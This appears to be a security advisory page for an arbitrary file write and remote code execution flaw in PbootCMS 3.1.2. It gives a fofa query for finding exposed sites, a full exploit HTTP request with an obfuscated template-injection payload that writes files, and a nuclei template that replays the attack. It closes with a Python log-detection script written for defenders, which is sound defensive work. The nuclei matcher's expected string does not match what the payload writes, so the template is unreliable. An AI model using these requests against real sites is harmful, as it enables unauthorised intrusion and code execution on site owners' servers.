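PbootCMS pboot arbitrary file upload vulnerability
1. Vulnerability overview
PbootCMS is a PHP enterprise website development and management system with an all-new kernel that is permanently open source and free. It is an efficient, concise and powerful PHP CMS codebase that is free for commercial use and can meet the needs of all kinds of enterprise website development. PbootCMS V3.1.2 contains an arbitrary file upload vulnerability that an attacker can exploit to execute commands remotely.
2. Affected versions
- PbootCMS 3.1.2
3. Asset mapping
- fofa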
app="PBOOTCMS"
- Fingerprint
4. Vulnerability reproduction
POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Connection: close
Cookie: lg=call_user_func
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

1[]=ayaq.txt&1[]=YXk=&2=$a,$b&3=return var_dump(file_put_contents($b,base64_decode($a)));
Uploaded file location
/ayaq.txt
The following nuclei template was provided by lulu (鲁鲁) from the Anyun Security (安云安全) internal group:
id: pbootcms-uploadfile

info:
  name: pbootcms-uploadfile
  author: lulu
  severity: high
  description: pbootcms-任意文件上传

http:
  - raw:
      - |
        POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
        Connection: close
        Cookie: lg=call_user_func
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 97

        1[]=ayaq.txt&1[]=YXk=&2=$a,$b&3=return var_dump(file_put_contents($b,base64_decode($a)));
      - |
        GET /ayaq.txt HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - status_code_2==200 && contains_all(body_2,"360nbplus1")
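For defenders, the request line shown above can be recognised in web server access logs: a template "if" tag arrives in a query parameter, with PHP comments padding the function calls. The following is an added detection example, not part of the original page or of PbootCMS; the regular expressions, function names and reason labels are assumptions, and the log lines are constructed around the request URI from this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed heuristics derived from the request on this page (not PbootCMS code).
TAG_IF = re.compile(r"\{\s*pb[^{}:]{0,40}:if\s*\(", re.I)   # template "if" tag opened in user input
COMMENT = re.compile(r"/\*.*?\*/", re.S)                     # PHP block comments used as padding
CALLS = re.compile(r"\b(create_function|usort|call_user_func(?:_array)?|"
                   r"file_put_contents|base64_decode)\s*\(", re.I)
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def inspect_uri(uri):
    """Return sorted reasons why a request URI looks like template-tag injection."""
    reasons = set()
    for _name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        decoded = unquote(value)            # second decode catches double-encoded input
        stripped = COMMENT.sub("", decoded) # remove comment padding before matching
        if TAG_IF.search(stripped):
            reasons.add("template-if-tag")
        if CALLS.search(stripped):
            reasons.add("php-call")
            if stripped != decoded:         # the call was only visible after stripping
                reasons.add("comment-padded-call")
    return sorted(reasons)

def scan(lines):
    """Return (line_number, reasons) for access-log lines with a suspicious URI."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        if m and (reasons := inspect_uri(m.group("uri"))):
            hits.append((n, reasons))
    return hits

# Constructed log lines; the URI on line 2 is the one shown on this page.
PAGE_URI = ("/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),"
            "create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));"
            "//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue")
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?tag=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "POST ' + PAGE_URI + ' HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?keyword=what+if(we)+usort HTTP/1.1" 200 811',
]

if __name__ == "__main__":
    for lineno, why in scan(SAMPLE_LOG):
        print(lineno, ", ".join(why))
```

Only the request line is inspected here; the POST body and the Cookie header do not appear in a default access log, so covering them needs WAF or application-level logging.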